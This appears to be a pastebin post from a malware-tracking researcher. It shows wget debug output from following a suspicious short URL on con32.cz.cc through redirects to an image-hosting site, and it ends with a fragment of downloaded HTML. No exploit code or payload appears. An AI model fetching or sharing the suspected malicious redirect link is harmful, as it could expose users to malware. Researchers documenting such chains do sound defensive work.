- --2014-08-26 23:25:20-- http://con32.cz.cc/4L2nJG5VxX
- Resolving con32.cz.cc (con32.cz.cc)... 192.95.12.34
- Caching con32.cz.cc => 192.95.12.34
- Connecting to con32.cz.cc (con32.cz.cc)|192.95.12.34|:80... connected.
- GET /4L2nJG5VxX HTTP/1.1
- ---response begin---
- HTTP/1.1 302 Found
- Date: Tue, 26 Aug 2014 14:24:18 GMT
- Server: Apache/2.4.6 (Linux/SUSE)
- X-Powered-By: PHP/5.4.20
- Location: http://www.bilder-upload.eu/thumb/47f07e-1409060469.jpg/4L2nJG5VxX
- Content-Length: 0
- Keep-Alive: timeout=15, max=100
- Connection: Keep-Alive
- Content-Type: text/html; charset=UTF-8
- 302 Found
- Location: http://www.bilder-upload.eu/thumb/47f07e-1409060469.jpg/4L2nJG5VxX [following]
- --2014-08-26 23:25:21-- http://www.bilder-upload.eu/thumb/47f07e-1409060469.jpg/4L2nJG5VxX
- conaddr is: 192.95.12.34
- Resolving www.bilder-upload.eu (www.bilder-upload.eu)... 94.23.195.180
- Caching www.bilder-upload.eu => 94.23.195.180
- Found www.bilder-upload.eu in host_name_addresses_map (0x2880d1a0)
- Connecting to www.bilder-upload.eu (www.bilder-upload.eu)|94.23.195.180|:80... connected.
- ---response begin---
- HTTP/1.1 302 Found
- Date: Tue, 26 Aug 2014 14:25:22 GMT
- Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
- Location: http://www.bilder-upload.eu/
- Vary: Accept-Encoding
- Content-Length: 212
- Keep-Alive: timeout=15, max=100
- Connection: Keep-Alive
- Content-Type: text/html; charset=iso-8859-1
- 302 Found
- URI content encoding = 'iso-8859-1'
- Location: http://www.bilder-upload.eu/ [following]
- <html><head>
- <title>302 Found</title>
- </head><body>
- <h1>Found</h1>
- <p>The document has moved <a href="http://www.bilder-upload.eu/">here</a>.</p>
- </body></html>
- ] done.
- --2014-08-26 23:25:22-- http://www.bilder-upload.eu/
- Reusing existing connection to www.bilder-upload.eu:80.
- ---request begin---
- GET / HTTP/1.1
- Accept: */*
- Host: www.bilder-upload.eu
- Connection: Keep-Alive
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Date: Tue, 26 Aug 2014 14:25:22 GMT
- Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
- X-Powered-By: PHP/5.2.6-1+lenny16
- Set-Cookie: PHPSESSID=2f47551d255e0b695257fc022a155c0a; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Keep-Alive: timeout=15, max=99
- Connection: Keep-Alive
- Transfer-Encoding: chunked
- Content-Type: text/html
- 200 OK
- Stored cookie www.bilder-upload.eu -1 (ANY) / <session> <insecure> [expiry none] PHPSESSID 2f47551d255e0b695257fc022a155c0a
- Length: unspecified [text/html]
- Saving to: '4L2nJG5VxX'
- 2014-08-26 23:25:23 (31.1 KB/s) - '4L2nJG5VxX' saved [8464]
- #
- # Downloaded the builder HTML
- #
- >Mit dem hochladen der Datei akzeptieren Sie unsere AGB.<
- </form>
- ----
- #MalwareMustDie!
Add Comment
Please, Sign In to add comment